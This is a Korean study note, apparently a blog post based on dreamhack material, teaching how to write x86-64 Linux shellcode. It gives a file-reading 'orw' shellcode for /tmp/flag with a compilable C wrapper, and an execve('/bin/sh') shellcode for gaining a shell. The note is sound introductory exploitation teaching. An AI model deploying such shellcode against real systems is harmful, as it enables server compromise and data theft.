Shellcode 란?

셸코드란? -> 익스플로잇을 위해 제작된 어셈블리 코드 조각 

일반적으로 셸을 획득하는 것이 목적!

어셈블리어로 이루어져있음 

Ex) 해커가 rip를 자신이 작성한 셸코드로 옮기면 해커가 원하는 어셈블리 코드를 실행할 수 있음 

 

orw 셸코드 작성 

- 파일을 열고 읽은 뒤 화면에 출력해주는 셸코드! 

/**
* /tmp/flag를 읽는 셸코드
*/

char buf[0x30];
int fd = open("/tmp/flag", RD_ONLY, NULL);
read(fd, buf, 0x30); // 파일 읽고 buf에 저장
write(1, buf, 0x30); // buf 에 있는 값 write

위는 우리가 만들 셸 코드의 c언어 의사코드

 

1. int fd = open(“/tmp/flag”, O_RDONLY, NULL)

open ( 대상 파일이름, 열기 옵션 (RDONLY, WRONLY..), 파일접근권한) 

 

우리가 해보는 것은 프로세스에 /tmp/flag 파일읽고 쓰게 하는 것! 즉,

  1. "/tmp/flag" 라는 문자열을 메모리에 위치시켜야 함 (스택에 "/tmp/flag"를 16진수 리틀엔디안으로 변환 후 push!!)  

  2. rdi(함수의 첫번째 인자)가 이를 가리키도록 rsp를 rdi로 옮긴다.

  3. RDONLY는 0이므로 rsi(두번째 인자)는 0으로 설정한다. 

  4. 파일 읽을 때 세번째 인자는 의미 없으므로 rdx(세번째 인자)는 0으로 설정

  5. 마지막으로!! rax를 open의 syscall 값인 2로 설정 

 

<구현> 

push 0x67
mov rax, 0x616c662f706d742f 
push rax
mov rdi, rsp    ; rdi = "/tmp/flag"
xor rsi, rsi    ; rsi = 0 ; RD_ONLY
xor rdx, rdx    ; rdx = 0
mov rax, 2      ; rax = 2 ; syscall_open
syscall         ; open("/tmp/flag", RD_ONLY, NULL)

 

2. read(fd, buf, 0x30)

read (파일 디스크립터(파일 접근제어자), 읽어들일 버퍼, 버퍼의 크기)

 

syscall의 반환값은 rax에 저장됨! 따라서 open으로 얻은 fd는 rax에 저장된다. 

1. read의 첫번째인자로 fd를 받아야 하므로 rax값을 rdi에 넣는다. 

2. rsi는 파일에서 읽은 데이터를 저장할 주소를 가지고 있어야 하며 우리가 읽을 데이터의 크기는 0x30이므로 rsp-0x30을 rsi에 대입한다. 

3. rdx는 0x30 으로 설정 

4. read를 위한 syscall 은 0이므로 rax는 0 

mov rdi, rax      ; rdi = fd
mov rsi, rsp
sub rsi, 0x30     ; rsi = rsp-0x30 ; buf
mov rdx, 0x30     ; rdx = 0x30     ; len
mov rax, 0x0      ; rax = 0        ; syscall_read
syscall           ; read(fd, buf, 0x30)

3. write(1, buf, 0x30)

 

1. 출력은 stdout으로 할것이므로 rdi는 0x1 ( 0 : 표준입력 STDIN, 1: 표준출력 STDOUT, 2: 표준에러 STDERR ) 

2. rsi, rdx 값은 위에서 사용한 것과 같다. 

3. write를 위한 syscall은 1 이므로 rax는 1 

mov rdi, 1        ; rdi = 1 ; fd = stdout
mov rax, 0x1      ; rax = 1 ; syscall_write
syscall           ; write(fd, buf, 0x30)

 

즉 최종적으로 셸코드는 

;Name: orw.S
push 0x67
mov rax, 0x616c662f706d742f 
push rax
mov rdi, rsp    ; rdi = "/tmp/flag"
xor rsi, rsi    ; rsi = 0 ; RD_ONLY
xor rdx, rdx    ; rdx = 0
mov rax, 2      ; rax = 2 ; syscall_open
syscall         ; open("/tmp/flag", RD_ONLY, NULL)
mov rdi, rax      ; rdi = fd
mov rsi, rsp
sub rsi, 0x30     ; rsi = rsp-0x30 ; buf
mov rdx, 0x30     ; rdx = 0x30     ; len
mov rax, 0x0      ; rax = 0        ; syscall_read
syscall           ; read(fd, buf, 0x30)
mov rdi, 1        ; rdi = 1 ; fd = stdout
mov rax, 0x1      ; rax = 1 ; syscall_write
syscall           ; write(fd, buf, 0x30)

이와 같다. 

해당 어셈블리어파일을 컴파일 하기위해서는 c 파일 형식의 스켈레톤 코드로 변환해야한다. 

// File name: orw.c
// Compile: gcc -o orw orw.c -masm=intel
__asm__(
    ".global run_sh\n"
    "run_sh:\n"
    "push 0x67\n"
    "mov rax, 0x616c662f706d742f \n"
    "push rax\n"
    "mov rdi, rsp    # rdi = '/tmp/flag'\n"
    "xor rsi, rsi    # rsi = 0 ; RD_ONLY\n"
    "xor rdx, rdx    # rdx = 0\n"
    "mov rax, 2      # rax = 2 ; syscall_open\n"
    "syscall         # open('/tmp/flag', RD_ONLY, NULL)\n"
    "\n"
    "mov rdi, rax      # rdi = fd\n"
    "mov rsi, rsp\n"
    "sub rsi, 0x30     # rsi = rsp-0x30 ; buf\n"
    "mov rdx, 0x30     # rdx = 0x30     ; len\n"
    "mov rax, 0x0      # rax = 0        ; syscall_read\n"
    "syscall           # read(fd, buf, 0x30)\n"
    "\n"
    "mov rdi, 1        # rdi = 1 ; fd = stdout\n"
    "mov rax, 0x1      # rax = 1 ; syscall_write\n"
    "syscall           # write(fd, buf, 0x30)\n"
    "\n"
    "xor rdi, rdi      # rdi = 0\n"
    "mov rax, 0x3c	   # rax = sys_exit\n"
    "syscall		   # exit(0)");
void run_sh();
int main() { run_sh(); }

gcc로 해당 c 파일을 컴파일하고 실행하면 우리의 셸코드가 잘 뜨는 것을 볼 수 있다. 

공격하고자 하는 대상의 시스템에서 해당 셸코드를 실행할 수 있다면 상대 서버의 자료를 유출해낼 수 있다.

 

각 함수마다 스택 프레임 생성 -> 함수 끝나면 스택 프레임 해제 ( but, garbage값이 남아있을 수 있으므로, 적절한 초기화가 필요!)

 

exeve 셸코드

- 임의의 프로그램을 실행하는 셸코드 

- 이를 사용하면 서버의 셸을 획득할 수 있음!

- 셸코드는 거의 exeve를 의미

 

/bin/sh 을 실행하는 셸코드를 작성해보자!

 

execve(“/bin/sh”, null, null)

인자는 (filename, 실행파일에 넘겨줄 인자, 환경변수)

우리는 sh 만 실행하면 되므로 2,3번째 인자는 모두 null로 설정해줘도 된다.

 

1. "/bin/sh" 16진수 리틀엔디안으로 변환 후 스택에 push

2. rsp에 들어있는 값을 rdi 에 대입 (첫번째 인자)

3. rsi, rdx는 null이므로 전부 0 

3. sys_execve를 호출하는 syscall은 0x3b 이므로 rax에 해당 값 대입 

;Name: execve.S
mov rax, 0x68732f6e69622f
push rax ; 스택에 파일 경로 16진수로 push 
mov rdi, rsp  ; rdi = "/bin/sh\x00" 
xor rsi, rsi  ; rsi = NULL
xor rdx, rdx  ; rdx = NULL
mov rax, 0x3b ; rax = sys_execve
syscall       ; execve("/bin/sh", null, null)

 

[출처]

dreamhack